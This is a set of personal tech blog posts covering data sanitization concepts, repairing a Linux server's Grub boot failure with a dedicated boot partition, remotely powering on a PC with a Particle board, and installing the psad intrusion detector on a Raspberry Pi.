<p>Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.</p>
<p>However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.</p>
<p>Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.</p>
<h2>Digital Sanitization</h2>
<p>Now we reach the stronger techniques for sanitizing data. Both of the two remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.</p>
<p>Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.</p>
<p>Or can you?</p>
<p>As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!</p>
<h2>Analog Sanitization</h2>
<p>Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property and replacing it with new dirt and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left to be used to try to reconstruct a replica house from. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and its impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.</p>
<h2>Afterword</h2>
<p>This article ended up becoming more conceptual than I originally intended, but I hope the analogy was able to make the concepts I covered approachable. As mentioned, I hope to at some point write a follow-up article using another analogy which can better explain the difference between digital and analog sanitization. I also hope to in the future write an article to serve as the practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.</p>The importance of boot partitions in Linux systems.2015-10-20T22:30:00-04:002015-10-20T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-20:/boot-partition.html<p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups …</p><p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems; so there I was.</p>
<p>In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.</p>
<h2>Finding the Problem</h2>
<p>The server in question was a Dell Poweredge T620 running Ubuntu. The server consisted of two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.</p>
<p>The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error <code>error: attempt to read or write outside of disk hd0</code>. After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.</p>
<p>My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.</p>
<h2>Diagnosing the Problem</h2>
<p>Since the error message that was appearing was being generated by Grub, the next thing I did was try to manually start the Linux kernel. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.</p>
<h3>Understanding Partitions</h3>
<p>Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.</p>
<p>First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drives follow a naming convention which starts with "sd" followed by a letter designating the drive. "sda", "sdb", "sdc", etc. Partition names are prefixed with a hard drive name followed by a digit designation. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.</p>
<p>Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form of "hd#,#" where the first # represents the disk number and the second # represents the partition on that disk. So "hd0,1", "hd0,2", and so on.</p>
<h3>Boot Sequence</h3>
<p>While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinux.</p>
<p>BIOS stands for Basic Input Output System and is the first thing the system executes upon receiving power. Once the BIOS is started, it'll perform some basic system checks and then load and execute the bootloader. There are many bootloaders out there, but Linux systems tend to use a particular one called Grub. Grub's job is to load the pieces into memory that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to write into memory are initrd and vmlinux. I won't discuss these files in great detail, but to explain them briefly, initrd is the initial RAM disk for the Linux operating system. What that means is that initrd contains a minimalistic copy of Linux comprising of only the kernel and essential programs. Grub will load it into memory and then execute it and it will start up the full Linux kernel contained in the vmlinux file. Once the full Linux kernel is booted, initrd will unload itself from memory.</p>
<h3>Diagnosing Grub</h3>
<p>Now that I've covered all the necessary background information, on to the Grub commands.</p>
<p>The first step is to find where the boot directory is on the system. First, list all the partitions on the system:</p>
<div class="highlight"><pre><span></span><code>grub> ls
</code></pre></div>
<p>This will create a list of all the partitions on the system. The next step is to figure out which one contains Grub, initrd, and vmlinux (since we're trying to boot a Linux operating system). This can also be done with the list command:</p>
<div class="highlight"><pre><span></span><code>grub> ls (hd0,1)
grub> ls (hd0,1)/boot
</code></pre></div>
<p>Once we've found the location of the boot files, set that partition as Grub's root directory:</p>
<div class="highlight"><pre><span></span><code>grub> set root=(hd0,1)
</code></pre></div>
<p>I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).</p>
<p>After we've found the correct root partition, we next need to give Grub the names of the vmlinux and initrd files:</p>
<div class="highlight"><pre><span></span><code>grub> /boot/vmlinux root=/dev/sda1
grub> initrd /boot/initrd
</code></pre></div>
<p>Note, the vmlinux command needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system. This may or may not be the same partition holding the boot files.</p>
<p>Once all the files have been specified, all that's left is to boot the operating system:</p>
<div class="highlight"><pre><span></span><code>grub> boot
</code></pre></div>
<p>At this point, you'll get a basic command shell for Linux. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command. Because of this, I now know that initrd is the problematic file. So how do we fix this?</p>
<h2>Remediation</h2>
<p>So what went wrong? Basically, the problem is with the partitions on the server's hard drives. For some reason, when Grub tries to load the initrd file into memory, it reaches the end of what it can read from the hard drive before reaching the end of the file. In our case, the problem is that our RAID controller makes the hard drives appear as a single 4TB drive. This is quite large and the initrd file could reside anywhere in those 4TBs. As it turns out, Grub could not address the memory location of our initrd file and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was modified and ended up in a location on the logical hard drive which Grub can't reach.</p>
<p>The solution to this problem is to keep the boot files to a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, despite the fact that most Linux installers do not require you to do this.</p>
<p>In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.</p>
<h2>Creating a Boot Partition in an Existing Linux Installation</h2>
<p>I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.</p>
<p>The first thing I did was use gparted to create a new partition which will serve as our dedicated boot partition. Since the hard drive is already formatted, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted to "ext4" and needs to have the "boot" flag enabled. Completing the shift will take awhile, so you'll probably want to do this overnight.</p>
<p>Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>-s
mkdir<span class="w"> </span>/mnt/sda2
mkdir<span class="w"> </span>/mnt/sda4
mount<span class="w"> </span>/dev/sda2<span class="w"> </span>/mnt/sda2
mount<span class="w"> </span>/dev/sda4<span class="w"> </span>/mnt/sda4
cp<span class="w"> </span>-R<span class="w"> </span>/mnt/sda2/boot/*<span class="w"> </span>/mnt/sda4/
rm<span class="w"> </span>-rf<span class="w"> </span>/mnt/sda2/boot/
mkdir<span class="w"> </span>/mnt/sda2/boot
umount<span class="w"> </span>/mnt/sda2
umount<span class="w"> </span>/mnt/sda4
</code></pre></div>
<p>Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use <a href="https://help.ubuntu.com/community/Boot-Repair">Boot Repair</a>. If you choose to go the Boot Repair route, make sure to switch the GUI into advance mode and go through all the options. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system"" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition and you can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to manually edit "grub.cfg" looking for every "hd" reference and changing it to point at the correct partitions and the fstab file will need an additional entry to mount your new partition at start-up to the "/boot" directory.</p>
<p>If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.</p>
<h2>Conclusion</h2>
<p>Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.</p>Using internet of things to turn on a computer.2015-09-18T11:16:00-04:002015-09-18T11:16:00-04:00Carter Yagemanntag:carteryagemann.com,2015-09-18:/desktop-remote-switch.html<p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The …</h2><p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The Scenario</h2>
<p>I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of <a href="http://hardware.slashdot.org/story/15/09/01/1318231/">electricity</a> when they're running. So running the computer 24/7 would be too wasteful.</p>
<p>Instead, I want to be able to turn on my computer from anywhere on the internet; whenever I desire to use it remotely.</p>
<p>This can be achieved using "wake-on-LAN" (<a href="https://en.wikipedia.org/wiki/Wake-on-LAN">WoL</a>), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a <a href="https://store.particle.io/">Particle Core</a> to my desktop's motherboard so it can turn on the computer for me!</p>
<h2>Particle</h2>
<p><img alt="particle" src="https://carteryagemann.com/images/particle-core.jpg"></p>
<p>For this hack, I used a Particle Core because that's what I had laying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to setup and configure your Particle device. If this is your first time using Particle, they have a tutorial <a href="https://docs.particle.io/guide/getting-started/start/core/#getting-to-know-you">here</a>.</p>
<h2>ATX Motherboards</h2>
<p>My motherboard is an ATX, but the process should be similar for other common motherboard specifications.</p>
<p>So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:</p>
<p><img alt="pin diagram" src="https://carteryagemann.com/images/pin-diagram.jpg"></p>
<p>One of the two pins (labled Power Switch in the above diagram) holds a 3.3V to 5V charge and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. This drop in voltage is detected by the motherboard which serves as the signal that it's time to power up.</p>
<p>For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.</p>
<h2>Wiring the Particle</h2>
<p>The circuit is pretty simple and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.</p>
<p><img alt="schematic" src="https://carteryagemann.com/images/schematic.jpg">
<img alt="particle wired to motherboard labeled" src="https://carteryagemann.com/images/desktop-interals-labled.jpg"></p>
<h2>Software</h2>
<p>One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!</p>
<p>The following is the source code for our Particle:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Mobo Power - Copyright 2015 Carter Yagemann</span>
<span class="cm"> * </span>
<span class="cm"> * This program allows a core to power on a motherboard over the internet!</span>
<span class="cm"> * </span>
<span class="cm"> * This program is free software: you can redistribute it and/or modify</span>
<span class="cm"> * it under the terms of the GNU General Public License as published by</span>
<span class="cm"> * the Free Software Foundation, either version 3 of the License, or</span>
<span class="cm"> * (at your option) any later version.</span>
<span class="cm"> * </span>
<span class="cm"> * This program is distributed in the hope that it will be useful,</span>
<span class="cm"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="cm"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="cm"> * GNU General Public License for more details.</span>
<span class="cm"> */</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">setup</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// D0 will control the motherboard</span>
<span class="w"> </span><span class="n">pinMode</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">OUTPUT</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// ATX boards maintain high power on their power pin and then ground</span>
<span class="w"> </span><span class="c1">// shortly to signal that the motherboard should power up. So we</span>
<span class="w"> </span><span class="c1">// normally want the pin to be in the high state.</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">HIGH</span><span class="p">);</span>
<span class="w"> </span><span class="c1">// Register a function with Particle's cloud service so we can invoke</span>
<span class="w"> </span><span class="c1">// the core from over the internet.</span>
<span class="w"> </span><span class="n">Spark</span><span class="p">.</span><span class="n">function</span><span class="p">(</span><span class="s">"poweron"</span><span class="p">,</span><span class="w"> </span><span class="n">powerOn</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">loop</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Nothing to do</span>
<span class="p">}</span>
<span class="kt">int</span><span class="w"> </span><span class="nf">powerOn</span><span class="p">(</span><span class="n">String</span><span class="w"> </span><span class="n">command</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Switch the pin to low for half a second so the motherboard knows</span>
<span class="w"> </span><span class="c1">// it's time to turn on.</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">LOW</span><span class="p">);</span>
<span class="w"> </span><span class="n">delay</span><span class="p">(</span><span class="mi">500</span><span class="p">);</span>
<span class="w"> </span><span class="n">digitalWrite</span><span class="p">(</span><span class="n">D0</span><span class="p">,</span><span class="w"> </span><span class="n">HIGH</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Once we've flashed our Particle with this software, all that's left is to use it!</p>
<h2>Pressing the button... from anywhere in the world</h2>
<p>You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:</p>
<div class="highlight"><pre><span></span><code>curl<span class="w"> </span>https://api.particle.io/v1/devices/device_id/powerOn<span class="w"> </span>-d<span class="w"> </span><span class="nv">access_token</span><span class="o">=</span>access_token
</code></pre></div>
<p>Where <code>device_id</code> is the ID for your Particle and the <code>access_token</code> is your account token.</p>
<p>And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my <a href="https://carteryagemann.com/index.html">homepage</a>.</p>
<p><em>Happy hacking!</em></p>Installing psad on Raspberry Pi Running Arch Linux2015-02-13T11:00:00-05:002015-02-13T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2015-02-13:/psad-on-pi.html<p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to …</p><p>I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.</p>
<h1>What is psad?</h1>
<p>psad is an intrusion detection system (IDS) which works by monitoring logs generated by iptables (a network firewall common to most Linux distros). You can find more information on psad <a href="http://cipherdyne.org/psad/">here</a>.</p>
<h1>Scope of this document</h1>
<p>The focus of this document is on challenges I ran into while trying to get psad to install and run on a raspberry pi and my solutions. This document does not cover how to configure or use psad. It <em>does</em> cover things which I had to taken into consideration due to the raspberry pi CPU being an ARM processor and due to my OS being Arch Linux with systemd.</p>
<h1>Contact</h1>
<p>Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at <a href="mailto:cmyagema@syr.edu">cmyagema@syr.edu</a>.</p>
<h1>Other Useful Resources</h1>
<ul>
<li><a href="http://cipherdyne.org/psad/">psad homepage</a></li>
<li>An installation guide that helped me <em>(Edit: This blog no longer exists)</em></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-use-psad-to-detect-network-intrusion-attempts-on-an-ubuntu-vps">A guide on configuring psad</a></li>
</ul>
<h1>Installing psad for ARM from AUR</h1>
<p>Since psad is not included in the main Arch Linux repositories, it has to be downloaded, compiled, and built from the AUR repository.</p>
<p>First, create a file (I will name it "list.txt") and write in it the following URLs:</p>
<div class="highlight"><pre><span></span><code><span class="nx">https</span><span class="p">:</span><span class="c1">//aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz</span>
<span class="nx">https</span><span class="p">:</span><span class="c1">//aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz</span>
<span class="nx">https</span><span class="p">:</span><span class="c1">//aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz</span>
<span class="nx">https</span><span class="p">:</span><span class="c1">//aur.archlinux.org/packages/ps/psad/psad.tar.gz</span>
</code></pre></div>
<p>These are the tarballs which we will need from AUR.</p>
<p>Next, run the following commands to untar the tarballs, build them, and install them:</p>
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span>list.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>xargs<span class="w"> </span>wget
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-iptables-parse.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-iptables-parse
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-iptables-parse-1.1-2-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-unix-syslog.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-unix-syslog
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-unix-syslog-1.1-4-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>perl-iptables-chainmgr.tar.gz
<span class="nb">cd</span><span class="w"> </span>perl-iptables-chainmgr
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
<span class="nb">cd</span><span class="w"> </span>..
tar<span class="w"> </span>xzvf<span class="w"> </span>psad.tar.gz
<span class="nb">cd</span><span class="w"> </span>psad
makepkg<span class="w"> </span>-Acs
sudo<span class="w"> </span>pacman<span class="w"> </span>-U<span class="w"> </span>--force<span class="w"> </span>psad-2.2.3-1-armv6h.pkg.tar.xz
</code></pre></div>
<p>Now if you are lucky, unlike me, this should be all you have to do. However, I ran into many additional problems which is what I will focus on in the next section.</p>
<h1>Configuration</h1>
<p>As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one configuration which I will mention because it's different from other systems. Namely, the location for syslog is in an usual location because of how systemd logs.</p>
<p>To fix this setting, list the contents of your <code>/var/log/journal/</code> directory. You should see a directory containing a bunch of letters and numbers and inside that directory should be a file called <code>system.journal</code>. I found that this is the file which psad has to be pointed to.</p>
<p>Once you have identified this path, open <code>/etc/psad/psad.conf</code> and point <code>IPT_SYSLOG_FILE</code> to this file. In my case, this means:</p>
<div class="highlight"><pre><span></span><code><span class="n">IPT_SYSLOG_FILE</span><span class="w"> </span><span class="o">/</span><span class="k">var</span><span class="o">/</span><span class="nb">log</span><span class="o">/</span><span class="n">journal</span><span class="o">/</span><span class="mi">37</span><span class="n">ed4fd73b0c416886710f1c8ffa083b</span><span class="o">/</span><span class="n">system</span><span class="o">.</span><span class="n">journal</span><span class="p">;</span>
</code></pre></div>
<p>If you want to try port scanning yourself or in general test your psad installation, be mindful that the raspberry pi has very limited computing resources so it might take awhile for your test to reflect in psad's status.</p>
<h2>Troubleshooting</h2>
<h3>wget fails due to certificates</h3>
<p>This one is easy, just replace the <code>cat link | xargs wget</code> with <code>cat link | xargs wget --no-check-certificate</code>.</p>
<h3>makepkg fails and returns a build error</h3>
<p>Try rebooting the raspberry pi. Sometimes not having enough memory can cause the build to fail.</p>
<h3>psad is installed, but when I run <code>sudo psad -S</code> I get the message <code>pid file [...]/psadwatchd.pid does not exist</code></h3>
<p>If you're seeing this towards the top of the output for <code>sudo psad -S</code>:</p>
<div class="highlight"><pre><span></span><code><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="c"> psad: pid file /var/run/psad/psadwatchd</span><span class="nt">.</span><span class="c">pid does not exist for psadwatchd on HOSTNAME</span>
</code></pre></div>
<p>Then you probably have the same problem I had.</p>
<p>This was the most painful of the problems I ran into and this was the problem which was big enough to convince me to write this document. If I hadn't ran into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. The problem in my case was "psadwatchd" wasn't starting for some reason when "psad" started. To confirm this as the source of the problem, run:</p>
<div class="highlight"><pre><span></span><code>ps -A | grep "psad"
</code></pre></div>
<p>If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.</p>
<p>The solution I came up for this is very much a hack, but it works decently. Basically, I got around this by making a separate service for psadwatchd.</p>
<p>First, create a new file: <code>/etc/systemd/system/psadwatchd.service</code></p>
<p>In this file, write:</p>
<div class="highlight"><pre><span></span><code><span class="k">[Unit]</span>
<span class="na">Description</span><span class="o">=</span><span class="s">Port scan attack detector daemon</span>
<span class="na">After</span><span class="o">=</span><span class="s">psad.service</span>
<span class="k">[Service]</span>
<span class="na">ExecStart</span><span class="o">=</span><span class="s">/usr/sbin/psadwatchd</span>
<span class="na">Type</span><span class="o">=</span><span class="s">oneshot</span>
<span class="na">RemainAfterExit</span><span class="o">=</span><span class="s">yes</span>
<span class="k">[Install]</span>
<span class="na">WantedBy</span><span class="o">=</span><span class="s">multi-user.target</span>
</code></pre></div>
<p>Next, confirm that you wrote this service file correctly by starting it in systemctl:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>systemctl<span class="w"> </span>start<span class="w"> </span>psadwatchd
</code></pre></div>
<p>If all went as it should, you should be able to execute the following two commands:</p>
<div class="highlight"><pre><span></span><code>ps<span class="w"> </span>-A<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span><span class="s2">"psad"</span>
sudo<span class="w"> </span>psad<span class="w"> </span>-S
</code></pre></div>
<p>The first command should return both a <code>psad</code> process and a <code>psadwatchd</code> process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.</p>
<p>Now that you've made a working psadwatchd service file, add this new service to systemd's startup list:</p>
<div class="highlight"><pre><span></span><code>sudo<span class="w"> </span>systemctl<span class="w"> </span><span class="nb">enable</span><span class="w"> </span>psadwatchd
</code></pre></div>
<p>And that should be it (hopefully).</p>